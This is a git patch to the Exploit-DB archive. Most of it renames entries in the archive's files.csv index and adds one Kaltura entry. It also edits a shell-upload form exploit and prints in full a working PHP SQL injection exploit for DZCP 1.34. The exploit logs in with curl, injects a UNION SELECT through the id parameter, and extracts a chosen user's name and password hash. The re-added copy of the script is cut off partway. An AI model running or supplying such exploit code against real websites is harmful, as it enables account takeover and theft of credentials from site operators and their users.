From 406c75cd1319b76f3ab9806c58ae7568a9b00d5d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 16 Mar 2016 05:02:50 +0000
Subject: [PATCH] DB: 2016-03-16

1 new exploits
---
 files.csv                       |  43 ++++----
 platforms/php/webapps/12857.txt |   2 +-
 platforms/php/webapps/1968.php  | 176 ++++++++++++++++----------------
 platforms/php/webapps/2876.txt  | 100 +++++++++---------
 platforms/php/webapps/3357.txt  |  20 ++--
 platforms/php/webapps/39563.txt | 108 ++++++++++++++++++++
 6 files changed, 279 insertions(+), 170 deletions(-)
 create mode 100755 platforms/php/webapps/39563.txt

diff --git a/files.csv b/files.csv
index d448bff4b..a8f799aa7 100755
--- a/files.csv
+++ b/files.csv
@@ -1675,7 +1675,7 @@ id,file,description,date,author,platform,type,port
 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
-1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
+1968,platforms/php/webapps/1968.php,"DZCP (deV!L`z Clanportal) <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability",2006-07-01,"Hamid Ebadi",php,webapps,0
 1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 (header.inc.php) Remote File Include Vulnerability",2006-07-01,OLiBekaS,php,webapps,0
@@ -2551,7 +2551,7 @@ id,file,description,date,author,platform,type,port
 2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (c)",2006-11-30,Expanders,windows,local,0
 2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0
 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
-2876,platforms/php/webapps/2876.txt,"deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
+2876,platforms/php/webapps/2876.txt,"DZCP (deV!L`z Clanportal) <= 1.3.6 - Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection Vulnerability",2006-12-01,N/A,php,webapps,0
 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0
 2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0
@@ -3024,7 +3024,7 @@ id,file,description,date,author,platform,type,port
 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities",2007-02-21,Denven,php,webapps,0
 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit",2007-02-21,s0cratex,php,webapps,0
 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client <= 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0
-3357,platforms/php/webapps/3357.txt,"deV!Lz Clanportal [DZCP] <= 1.4.5 - Remote File Disclosure Vulnerability",2007-02-21,Kiba,php,webapps,0
+3357,platforms/php/webapps/3357.txt,"DZCP (deV!L`z Clanportal) <= 1.4.5 - Remote File Disclosure Vulnerability",2007-02-21,Kiba,php,webapps,0
 3358,platforms/multiple/remote/3358.pl,"Oracle 10g KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0
 3359,platforms/multiple/remote/3359.pl,"Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0
 3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 (index.php func) Remote File Include Vulnerability",2007-02-22,JuMp-Er,php,webapps,0
@@ -6523,7 +6523,7 @@ id,file,description,date,author,platform,type,port
 6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0
 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection Vulnerability",2008-11-02,d3v1l,php,webapps,0
 6960,platforms/php/webapps/6960.txt,"1st News - (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0
-6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0
+6961,platforms/php/webapps/6961.pl,"DZCP (deV!L`z Clanportal) <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0
 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0
 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0
 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0
@@ -10588,7 +10588,7 @@ id,file,description,date,author,platform,type,port
 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0
 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0
 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
-11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,indoushka,php,webapps,0
+11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0
 11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,indoushka,php,webapps,0
 11573,platforms/windows/local/11573.c,"MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0
 11574,platforms/hardware/dos/11574.py,"iPhone WebCore::CSSSelector() Remote Crash Vulnerability",2010-02-24,t12,hardware,dos,0
@@ -10733,7 +10733,7 @@ id,file,description,date,author,platform,type,port
 11732,platforms/php/webapps/11732.txt,"Php-Nuke - Local File Include Vulnerability",2010-03-14,ITSecTeam,php,webapps,0
 11733,platforms/php/webapps/11733.txt,"phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection",2010-03-14,"Easy Laster",php,webapps,0
 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0
-11735,platforms/php/webapps/11735.php,"deV!L`z Clanportal 1.5.2 - Remote File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
+11735,platforms/php/webapps/11735.php,"DZCP (deV!L`z Clanportal) 1.5.2 - Remote File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0
 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0
 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389
 11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0
@@ -10918,13 +10918,13 @@ id,file,description,date,author,platform,type,port
 11943,platforms/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,php,webapps,0
 11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - (.pls) Universal Stack Overflow Exploit",2010-03-28,mat,windows,local,0
 11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
-11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
-11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
+11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
+11948,platforms/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
 11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
 11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
-11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
+11951,platforms/php/webapps/11951.txt,"E-book Store - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
 11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 - (.asx) Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0
-11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software Mullti Vulnerability",2010-03-30,EL-KAHINA,php,webapps,0
+11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,php,webapps,0
 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ITSecTeam,windows,dos,0
 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - (.asx) Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0
 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0
@@ -10951,7 +10951,7 @@ id,file,description,date,author,platform,type,port
 11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0
 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0
 11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0
-11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
+11989,platforms/php/webapps/11989.txt,"Faweb_2 - Multiple Vulnerabilities",2010-03-30,indoushka,php,webapps,0
 11990,platforms/php/webapps/11990.txt,"Joomla Component com_network SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
 11991,platforms/php/webapps/11991.txt,"Joomla Component com_tour SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
 11992,platforms/php/webapps/11992.txt,"Joomla Component com_trading Blind SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
@@ -11059,7 +11059,7 @@ id,file,description,date,author,platform,type,port
 12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 Exploit",2010-04-07,Rh0,multiple,local,0
 12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) PoC (SEH) 0day",2010-04-07,ITSecTeam,windows,dos,0
 12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,indoushka,php,webapps,0
-12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,indoushka,php,webapps,0
+12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0
 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion Vulnerabilities",2010-04-07,eidelweiss,php,webapps,0
 12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles SQL Injection Vulnerability",2010-04-08,"pratul agrawal",php,webapps,0
 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability",2010-04-08,ZSploit.com,multiple,dos,0
@@ -11360,10 +11360,10 @@ id,file,description,date,author,platform,type,port
 12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
 12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
 12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
-12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
+12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
 12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup Vulnerability",2010-04-29,indoushka,php,webapps,0
 12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload Vulnerability and XSS",2010-04-29,Sid3^effects,php,webapps,0
-12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
+12449,platforms/php/webapps/12449.txt,"DZCP (deV!L`z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0
 12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
 12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
 12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection Vulnerability",2010-04-29,"Justin C. Klein Keane",php,webapps,0
@@ -11692,7 +11692,7 @@ id,file,description,date,author,platform,type,port
 12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0
 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - (.zar) DoS",2010-05-31,TecR0c,windows,dos,0
 12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,indoushka,php,webapps,0
-12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,indoushka,php,webapps,0
+12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - (RFI/XSS) Multiple Vulnerabilities",2010-05-31,indoushka,php,webapps,0
 12819,platforms/php/webapps/12819.txt,"Persian E107 - XSS Vulnerability",2010-05-31,indoushka,php,webapps,0
 12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0
 12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
@@ -11713,7 +11713,7 @@ id,file,description,date,author,platform,type,port
 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0
 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI Vulnerability",2010-06-03,Sid3^effects,php,webapps,0
 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
-12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,indoushka,php,webapps,0
+12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities",2010-06-03,indoushka,php,webapps,0
 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,indoushka,php,webapps,0
 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
 12861,platforms/php/webapps/12861.txt,"PHP SETI@home Web monitor (phpsetimon) RFI / LFI Vulnerability",2010-06-03,eidelweiss,php,webapps,0
@@ -13334,7 +13334,7 @@ id,file,description,date,author,platform,type,port
 15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - CSRF Change Admin Password PoC",2010-10-26,Sweet,php,webapps,0
 15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and searchString) - SQL Injection Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
-15323,platforms/php/webapps/15323.txt,"DZCP (deV!Lz Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
+15323,platforms/php/webapps/15323.txt,"DZCP (deV!L`z Clanportal) 1.5.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
 15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
 15325,platforms/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure Vulnerability",2010-10-27,"High-Tech Bridge SA",php,webapps,0
 15326,platforms/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure Vulnerabilities",2010-10-27,"High-Tech Bridge SA",php,webapps,0
@@ -15935,8 +15935,8 @@ id,file,description,date,author,platform,type,port
 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0
 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection Vulnerability",2012-01-18,3spi0n,php,webapps,0
 18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0
-18385,platforms/php/webapps/18385.txt,"deV!L`z Clanportal Gamebase Addon SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
-18386,platforms/php/webapps/18386.txt,"deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
+18385,platforms/php/webapps/18385.txt,"DZCP (deV!L`z Clanportal) Gamebase Addon - SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
+18386,platforms/php/webapps/18386.txt,"DZCP (deV!L`z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection Vulnerability",2012-01-18,"Easy Laster",php,webapps,0
 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,metasploit,windows,remote,0
 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 - 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0
 18390,platforms/php/webapps/18390.txt,"wordpress ucan post plugin <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0
@@ -16085,7 +16085,7 @@ id,file,description,date,author,platform,type,port
 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0
 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0
 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0
-18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
+18558,platforms/php/webapps/18558.txt,"DZCP (deV!L`z Clanportal) Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0
 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0
 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0
 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0
@@ -26246,7 +26246,7 @@ id,file,description,date,author,platform,type,port
 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability",2006-12-01,kcope,netbsd_x86,dos,0
 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.PHP IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0
 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure Vulnerability",2013-10-28,"Sebastián Magof",hardware,webapps,0
-29207,platforms/php/webapps/29207.txt,"deV!Lz Clanportal 1.3.6 Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
+29207,platforms/php/webapps/29207.txt,"DZCP (deV!L`z Clanportal) 1.3.6 - Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0
 29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0
 29232,platforms/php/webapps/29232.txt,"Link CMS navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0
 29233,platforms/php/webapps/29233.txt,"Link CMS prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0
@@ -35136,6 +35136,7 @@ id,file,description,date,author,platform,type,port
 38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
 38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
+39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"Wordpress Plugin Advanced uploader v2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"Wordpress Plugin Sell Download v1.0.16  - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
 38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7  - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
diff --git a/platforms/php/webapps/12857.txt b/platforms/php/webapps/12857.txt
index 4889f0245..f70aa6469 100755
--- a/platforms/php/webapps/12857.txt
+++ b/platforms/php/webapps/12857.txt
@@ -86,7 +86,7 @@ FILE NAME:<br>
 
 <input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
 
-<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> 
+<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
 
 <input name="submit" type="submit" value="   Save   " > 
 
diff --git a/platforms/php/webapps/1968.php b/platforms/php/webapps/1968.php
index 8fd73b232..12967cbb5 100755
--- a/platforms/php/webapps/1968.php
+++ b/platforms/php/webapps/1968.php
@@ -1,88 +1,88 @@
-<?
-error_reporting(E_ERROR);
-
-function exploit_init()
-{
-    if (!extension_loaded('php_curl') && !extension_loaded('curl'))
-    {
-       if (!dl('curl.so') && !dl('php_curl.dll'))
-       die ("oo error - cannot load curl extension!");
-    }
-}
-
-function exploit_header()
-{
-    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
-    echo "                                  oo    ooooooo     ooooooo\n";
-    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
-    echo "                      888o888    888        o888   888888888\n";
-    echo "                      o88888o    888     o888   o 888o   o888\n";
-    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
-    echo "oooooooooooooooooooooooo dzcp 1.34 remote sql injection oooooooooooooooooooooooo\n";
-    echo "oo usage          $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
-    echo "oo proxy support  $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
-    echo "                  [proxy]:[port]\n";
-    echo "oo example        $ php dzcp-134-exploit.php http://localhost x128 pwd 1\n";
-    echo "oo you need an account on the system\n";
-    echo "oo print the password of the user\n\n";
-}
-
-function exploit_bottom()
-{
-    echo "\noo greets   : tlm65 - i want to wish you a happy 23st birthday! thank you for\n";
-    echo "              the last two years. we never become the fastest hacking group on\n";
-    echo "              net without you.\n";
-    echo "oo discover : x128 - alexander wilhelm - 30/06/2006\n";
-    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net\n";
-}
-
-function exploit_execute()
-{
-    $connection = curl_init();
-
-    if ($_SERVER['argv'][5])
-    {
-        curl_setopt($connection, CURLOPT_TIMEOUT, 8);
-        curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][5]);
-    }
-    curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
-    curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
-    curl_setopt ($connection, CURLOPT_HEADER, 0);
-    curl_setopt ($connection, CURLOPT_POST, 1);
-    curl_setopt ($connection, CURLOPT_COOKIE, 1);
-    curl_setopt ($connection, CURLOPT_COOKIEJAR, 'exp-cookie.txt');
-    curl_setopt ($connection, CURLOPT_COOKIEFILE, 'exp-cookie.txt');
-    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=login&do=yes");
-    curl_setopt ($connection, CURLOPT_POSTFIELDS, "user=" . $_SERVER['argv'][2] . "&pwd=" . $_SERVER['argv'][3] . "&permanent=1");
-
-    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
-
-    curl_setopt ($connection, CURLOPT_POST, 0);
-    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=x128");
-    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
-
-    preg_match("/FROM ([0-9a-zA-Z_]*)messages/", $source, $prefix);
-
-    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/user/index.php?action=msg&do=answer&id=" . urlencode("-1 UNION SELECT 1,1,1,1,1,1,user,pwd,1,1 FROM " . $prefix[1] . "users WHERE id = " . $_SERVER['argv'][4]));
-    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
-
-    preg_match("/>([0-9a-f]{32})</", $source, $password);
-    preg_match("/RE: (.*)\" class/", $source, $user);
-
-    if ($password[1])
-    {
-        echo "oo user           " . $user[1] . "\n";
-        echo "oo password       " . $password[1] . "\n\n";
-        echo "oo dafaced ...\n";
-    }
-
-    curl_close ($connection);
-}
-
-exploit_init();
-exploit_header();
-exploit_execute();
-exploit_bottom();
-?>
-
-# milw0rm.com [2006-07-01]
+<?
+error_reporting(E_ERROR);
+
+function exploit_init()
+{
+    if (!extension_loaded('php_curl') && !extension_loaded('curl'))
+    {
+       if (!dl('curl.so') && !dl('php_curl.dll'))
+       die ("oo error - cannot load curl extension!");
+    }
+}
+
+function exploit_header()
+{
+    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
+    echo "                                  oo    ooooooo     ooooooo\n";
+    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
+    echo "                      888o888    888        o888   888888888\n";
+    echo "                      o88888o    888     o888   o 888o   o888\n";
+    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
+    echo "oooooooooooooooooooooooo dzcp 1.34 remote sql injection oooooooooooooooooooooooo\n";
+    echo "oo usage          $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
+    echo "oo proxy support  $ php dzcp-134-exploit.php [url] [user] [pwd] [id]\n";
+    echo "                  [proxy]:[port]\n";
+    echo "oo example        $ php dzcp-134-exploit.php http://localhost x128 pwd 1\n";
+    echo "oo you need an account on the system\n";
+    echo "oo print the password of the user\n\n";
+}
+
+function exploit_bottom()
+{
+    echo "\noo greets   : tlm65 - i want to wish you a happy 23st birthday! thank you for\n";
+    echo "              the last two years. we never become the fastest hacking group on\n";
+    echo "              net without you.\n";
+    echo "oo discover : x128 - alexander wilhelm - 30/06/2006\n";
+    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net\n";
+}
+
+function exploit_execute()
